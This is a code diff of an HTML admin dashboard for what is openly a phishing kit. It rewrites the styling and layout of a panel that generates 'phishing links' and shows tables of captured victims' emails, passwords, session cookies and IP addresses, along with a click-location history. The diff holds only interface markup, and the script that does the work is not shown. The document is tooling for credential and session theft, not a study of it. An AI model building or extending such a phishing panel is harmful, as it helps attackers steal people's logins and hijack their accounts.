--- a/dashboard.html
+++ b/dashboard.html
@@ -4,48 +4,91 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Dashboard</title>
-    <link rel="stylesheet" href="styles.css">
+    <style>
+        /* Sidebar Menu */
+        #menu {
+            width: 200px;
+            height: 100vh;
+            background: #222;
+            color: white;
+            padding: 20px;
+            position: fixed;
+            left: 0;
+            top: 0;
+        }
+        #menu button {
+            display: block;
+            width: 100%;
+            margin: 10px 0;
+            padding: 10px;
+            border: none;
+            background: #444;
+            color: white;
+            cursor: pointer;
+            transition: 0.3s;
+        }
+        #menu button:hover {
+            background: #666;
+        }
+        /* Content */
+        #content {
+            margin-left: 220px;
+            padding: 20px;
+        }
+        table {
+            width: 100%;
+            border-collapse: collapse;
+        }
+        table, th, td {
+            border: 1px solid black;
+        }
+        th, td {
+            padding: 10px;
+            text-align: left;
+        }
+    </style>
 </head>
-<body class="dashboard-body">
-    <div class="sidebar">
-        <h2>Menu</h2>
-        <button class="menu-btn" onclick="generateLink()">Generate Link</button>
-        <button class="menu-btn" onclick="fetchCapturedSessions()">Captured Sessions</button>
-        <button class="menu-btn" onclick="fetchCookies()">Cookies</button>
-        <button class="menu-btn logout-btn" onclick="logout()">Logout</button>
-    </div>
+<body>
 
-    <div class="main-content">
-        <h2>Dashboard</h2>
-        <div id="generated-link"></div>
-        
-        <h3>Captured Sessions</h3>
-        <table id="captured-sessions">
-            <thead>
-                <tr>
-                    <th>Email</th>
-                    <th>Password</th>
-                    <th>Cookies</th>
-                    <th>IP</th>
-                </tr>
-            </thead>
-            <tbody></tbody>
-        </table>
+<div id="menu">
+    <button onclick="generateLink()">Generate Link</button>
+    <button onclick="fetchCapturedSessions()">Captured Sessions</button>
+    <button onclick="fetchGeneratedLinks()">Generated Links</button>
+    <button onclick="logout()">Logout</button>
+</div>
 
-        <h3>Generated Links History</h3>
-        <table id="link-history">
-            <thead>
-                <tr>
-                    <th>Generated Link</th>
-                    <th>Location Clicked</th>
-                    <th>IP Address</th>
-                </tr>
-            </thead>
-            <tbody></tbody>
-        </table>
-    </div>
+<div id="content">
+    <h2>Dashboard</h2>
     
-    <script src="firebase-config.js"></script>
-    <script src="script.js"></script>
+    <h3>Generated Phishing Link</h3>
+    <p id="generatedLink">Click "Generate Link" to create one.</p>
+
+    <h3>Captured Sessions</h3>
+    <table>
+        <thead>
+            <tr>
+                <th>Email</th>
+                <th>Password</th>
+                <th>Cookies</th>
+                <th>IP Address</th>
+            </tr>
+        </thead>
+        <tbody id="sessionsTableBody"></tbody>
+    </table>
+
+    <h3>Generated Links History</h3>
+    <table>
+        <thead>
+            <tr>
+                <th>Generated Link</th>
+                <th>Location</th>
+                <th>IP Address</th>
+            </tr>
+        </thead>
+        <tbody id="linksTableBody"></tbody>
+    </table>
+</div>
+
+<script src="script.js"></script>
 </body>
 </html>
